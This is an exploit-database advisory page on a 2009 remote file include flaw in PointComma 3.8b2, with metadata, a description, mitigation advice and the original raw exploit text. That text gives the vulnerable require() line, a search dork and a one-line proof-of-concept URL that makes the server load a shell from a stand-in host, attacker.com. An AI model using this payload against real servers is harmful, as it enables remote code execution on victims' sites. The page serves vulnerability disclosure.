header-logo
Suggest Exploit
vendor:
PointComma
by:
cr4wl3r
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: PointComma
Affected Version From: 3.8b2
Affected Version To: 3.8b2
Patch Exists: Yes
Related CWE: N/A
CPE: a:pointcomma:pointcomma:3.8b2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PointComma <= 3.8b2 Remote File Include Vulnerability

PointComma version 3.8b2 is vulnerable to a Remote File Include vulnerability. The vulnerability exists in the 'includes/classes/pctemplate.php' file, where the 'pcConfig[smartyPath]' parameter is not properly sanitized before being used in a 'require' function. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file from a remote server, which will be included and executed by the vulnerable script.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of PointComma.
Source

Exploit-DB raw data:

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#PointComma <= 3.8b2 Remote File Include Vulnerability
#Download Script      :  http://nchc.dl.sourceforge.net/project/pointcomma/pointcomma/
#Dork                 :  die("Hacking attempt");  :D
########################################################################
#
#Vuln : ./PointComma-3.8b2/includes/classes/pctemplate.php (line 14)
#       <?php
#          require($pcConfig['smartyPath'].'Smarty.class.php'); 
#       ?>
#PoC  :  http://server/[path]/includes/classes/pctemplate.php?pcConfig[smartyPath]=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
#        dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################

/##############################################\
#   all member at  sekuritionline.net          #
#   all member at  manadocoding.net            #
\##############################################/

   [ Gorontalo / 2009 ]